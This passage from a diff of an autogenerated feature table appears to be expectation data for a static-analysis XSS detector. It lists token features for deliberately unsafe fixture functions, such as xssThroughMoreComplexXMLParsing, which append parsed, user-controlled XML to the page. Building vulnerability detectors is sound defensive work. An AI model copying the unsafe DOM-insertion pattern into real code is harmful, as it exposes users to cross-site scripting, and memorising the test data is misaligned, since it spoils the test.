tmp | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:52:12:61 | "text/xml" | enclosingFunctionName | xssThroughMoreComplexXMLParsing | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:52:12:61 | "text/xml" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:13:11:13:13 | xml | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:13:11:13:13 | xml | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:13:11:13:13 | xml | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml xml doc documentElement tmp document createElement span tmp appendChild xml cloneNode document querySelector #xml appendChild tmp | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:13:11:13:13 | xml | enclosingFunctionName | xssThroughMoreComplexXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:13:11:13:13 | xml | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:13:11:13:35 | xml | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:13:11:13:35 | xml | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:13:11:13:35 | xml | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml xml doc documentElement tmp document createElement span tmp appendChild xml cloneNode document querySelector #xml appendChild tmp | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:13:11:13:35 | xml | enclosingFunctionName | xssThroughMoreComplexXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:13:11:13:35 | xml | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:13:11:13:35 | xml = d ... Element | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:13:11:13:35 | xml = d ... Element | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:13:11:13:35 | xml = d ... Element | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml xml doc documentElement tmp document createElement span tmp appendChild xml cloneNode document querySelector #xml appendChild tmp | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:13:11:13:35 | xml = d ... Element | enclosingFunctionName | xssThroughMoreComplexXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:13:11:13:35 | xml = d ... Element | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:13:17:13:19 | doc | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:13:17:13:19 | doc | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:13:17:13:19 | doc | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml xml doc documentElement tmp document createElement span tmp appendChild xml cloneNode document querySelector #xml appendChild tmp | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:13:17:13:19 | doc | enclosingFunctionName | xssThroughMoreComplexXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:13:17:13:19 | doc | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:13:17:13:35 | doc.documentElement | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:13:17:13:35 | doc.documentElement | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:13:17:13:35 | doc.documentElement | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml xml doc documentElement tmp document createElement span tmp appendChild xml cloneNode document querySelector #xml appendChild tmp | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:13:17:13:35 | doc.documentElement | enclosingFunctionName | xssThroughMoreComplexXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:13:17:13:35 | doc.documentElement | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:13:21:13:35 | documentElement | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:13:21:13:35 | documentElement | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:13:21:13:35 | documentElement | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml xml doc documentElement tmp document createElement span tmp appendChild xml cloneNode document querySelector #xml appendChild tmp | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:13:21:13:35 | documentElement | enclosingFunctionName | xssThroughMoreComplexXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:13:21:13:35 | documentElement | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:15:11:15:13 | tmp | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:15:11:15:13 | tmp | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:15:11:15:13 | tmp | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml xml doc documentElement tmp document createElement span tmp appendChild xml cloneNode document querySelector #xml appendChild tmp | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:15:11:15:13 | tmp | enclosingFunctionName | xssThroughMoreComplexXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:15:11:15:13 | tmp | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:15:11:15:46 | tmp | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:15:11:15:46 | tmp | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:15:11:15:46 | tmp | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml xml doc documentElement tmp document createElement span tmp appendChild xml cloneNode document querySelector #xml appendChild tmp | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:15:11:15:46 | tmp | enclosingFunctionName | xssThroughMoreComplexXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:15:11:15:46 | tmp | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:15:11:15:46 | tmp = d ... 'span') | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:15:11:15:46 | tmp = d ... 'span') | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:15:11:15:46 | tmp = d ... 'span') | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml xml doc documentElement tmp document createElement span tmp appendChild xml cloneNode document querySelector #xml appendChild tmp | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:15:11:15:46 | tmp = d ... 'span') | enclosingFunctionName | xssThroughMoreComplexXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:15:11:15:46 | tmp = d ... 'span') | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:15:17:15:24 | document | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:15:17:15:24 | document | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:15:17:15:24 | document | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml xml doc documentElement tmp document createElement span tmp appendChild xml cloneNode document querySelector #xml appendChild tmp | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:15:17:15:24 | document | enclosingFunctionName | xssThroughMoreComplexXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:15:17:15:24 | document | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:15:17:15:38 | documen ... Element | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:15:17:15:38 | documen ... Element | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:15:17:15:38 | documen ... Element | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml xml doc documentElement tmp document createElement span tmp appendChild xml cloneNode document querySelector #xml appendChild tmp | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:15:17:15:38 | documen ... Element | enclosingFunctionName | xssThroughMoreComplexXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:15:17:15:38 | documen ... Element | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:15:17:15:46 | documen ... 'span') | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:15:17:15:46 | documen ... 'span') | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:15:17:15:46 | documen ... 'span') | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml xml doc documentElement tmp document createElement span tmp appendChild xml cloneNode document querySelector #xml appendChild tmp | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:15:17:15:46 | documen ... 'span') | enclosingFunctionName | xssThroughMoreComplexXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:15:17:15:46 | documen ... 'span') | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:15:17:15:46 | exceptional return of documen ... 'span') | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:15:17:15:46 | exceptional return of documen ... 'span') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:15:17:15:46 | exceptional return of documen ... 'span') | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml xml doc documentElement tmp document createElement span tmp appendChild xml cloneNode document querySelector #xml appendChild tmp | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:15:17:15:46 | exceptional return of documen ... 'span') | enclosingFunctionName | xssThroughMoreComplexXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:15:17:15:46 | exceptional return of documen ... 'span') | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:15:26:15:38 | createElement | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:15:26:15:38 | createElement | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:15:26:15:38 | createElement | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml xml doc documentElement tmp document createElement span tmp appendChild xml cloneNode document querySelector #xml appendChild tmp | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:15:26:15:38 | createElement | enclosingFunctionName | xssThroughMoreComplexXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:15:26:15:38 | createElement | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:15:40:15:45 | 'span' | CalleeFlexibleAccessPath | document.createElement | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:15:40:15:45 | 'span' | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:15:40:15:45 | 'span' | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | @@ -22862,6 +151070,46 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:15:40:15:45 | 'span' | enclosingFunctionName | xssThroughMoreComplexXMLParsing | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:15:40:15:45 | 'span' | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:15:40:15:45 | 'span' | receiverName | document | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:16:5:16:7 | tmp | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:16:5:16:7 | tmp | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:16:5:16:7 | tmp | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml xml doc documentElement tmp document createElement span tmp appendChild xml cloneNode document querySelector #xml appendChild tmp | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:16:5:16:7 | tmp | enclosingFunctionName | xssThroughMoreComplexXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:16:5:16:7 | tmp | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:16:5:16:19 | tmp.appendChild | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:16:5:16:19 | tmp.appendChild | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:16:5:16:19 | tmp.appendChild | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml xml doc documentElement tmp document createElement span tmp appendChild xml cloneNode document querySelector #xml appendChild tmp | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:16:5:16:19 | tmp.appendChild | enclosingFunctionName | xssThroughMoreComplexXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:16:5:16:19 | tmp.appendChild | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:16:5:16:36 | exceptional return of tmp.app ... Node()) | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:16:5:16:36 | exceptional return of tmp.app ... Node()) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:16:5:16:36 | exceptional return of tmp.app ... Node()) | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml xml doc documentElement tmp document createElement span tmp appendChild xml cloneNode document querySelector #xml appendChild tmp | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:16:5:16:36 | exceptional return of tmp.app ... Node()) | enclosingFunctionName | xssThroughMoreComplexXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:16:5:16:36 | exceptional return of tmp.app ... Node()) | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:16:5:16:36 | tmp.app ... Node()) | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:16:5:16:36 | tmp.app ... Node()) | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:16:5:16:36 | tmp.app ... Node()) | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml xml doc documentElement tmp document createElement span tmp appendChild xml cloneNode document querySelector #xml appendChild tmp | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:16:5:16:36 | tmp.app ... Node()) | enclosingFunctionName | xssThroughMoreComplexXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:16:5:16:36 | tmp.app ... Node()) | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:16:9:16:19 | appendChild | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:16:9:16:19 | appendChild | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:16:9:16:19 | appendChild | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml xml doc documentElement tmp document createElement span tmp appendChild xml cloneNode document querySelector #xml appendChild tmp | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:16:9:16:19 | appendChild | enclosingFunctionName | xssThroughMoreComplexXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:16:9:16:19 | appendChild | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:16:21:16:23 | xml | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:16:21:16:23 | xml | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:16:21:16:23 | xml | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml xml doc documentElement tmp document createElement span tmp appendChild xml cloneNode document querySelector #xml appendChild tmp | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:16:21:16:23 | xml | enclosingFunctionName | xssThroughMoreComplexXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:16:21:16:23 | xml | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:16:21:16:33 | xml.cloneNode | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:16:21:16:33 | xml.cloneNode | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:16:21:16:33 | xml.cloneNode | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml xml doc documentElement tmp document createElement span tmp appendChild xml cloneNode document querySelector #xml appendChild tmp | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:16:21:16:33 | xml.cloneNode | enclosingFunctionName | xssThroughMoreComplexXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:16:21:16:33 | xml.cloneNode | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:16:21:16:35 | exceptional return of xml.cloneNode() | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:16:21:16:35 | exceptional return of xml.cloneNode() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:16:21:16:35 | exceptional return of xml.cloneNode() | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml xml doc documentElement tmp document createElement span tmp appendChild xml cloneNode document querySelector #xml appendChild tmp | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:16:21:16:35 | exceptional return of xml.cloneNode() | enclosingFunctionName | xssThroughMoreComplexXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:16:21:16:35 | exceptional return of xml.cloneNode() | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:16:21:16:35 | xml.cloneNode() | CalleeFlexibleAccessPath | tmp.appendChild | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:16:21:16:35 | xml.cloneNode() | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:16:21:16:35 | xml.cloneNode() | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | @@ -22870,6 +151118,51 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:16:21:16:35 | xml.cloneNode() | enclosingFunctionName | xssThroughMoreComplexXMLParsing | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:16:21:16:35 | xml.cloneNode() | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:16:21:16:35 | xml.cloneNode() | receiverName | tmp | +| 